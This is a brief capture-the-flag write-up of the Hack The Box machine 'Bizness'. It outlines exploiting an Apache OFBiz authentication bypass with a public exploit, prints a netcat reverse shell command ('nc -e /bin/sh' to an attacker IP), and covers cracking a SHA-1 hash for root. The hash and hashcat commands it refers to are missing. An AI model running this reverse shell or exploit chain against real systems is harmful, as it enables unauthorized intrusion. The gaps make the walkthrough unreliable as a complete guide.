BIZNESS HTB WRITE UP
WRITEUP
When we first enter the machine, we perform an nmap scan. In the scan we performed, only port 22 and port 80 appear to be open, so the vulnerability that will likely allow us to enter the machine is probably on the website. After browsing the website for a while, we see that this website is developed with “Apache OFBiz.”
“Apache OFBiz” is a vulnerable application with an RCE (Remote Code Execution) vulnerability.
https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass
Therefore, we simply download the code from this site to get a reverse shell by running the command “nc -e /bin/sh 10.10.16.42 4242”. Then we obtain our first flag.
After exploring the files for a bit to gain root privileges, I came across a SHA-1 hash that looks like this:
Let’s first convert the hash to an appropriate format for cracking.
s
Then we’ll run the following hashcat code. While running this code, let’s not forget the “:d” expression at the end.
Now that we know the password, we simply run the “su” command, enter the password, and gain root privileges. Then, we obtain the final flag, the root flag.
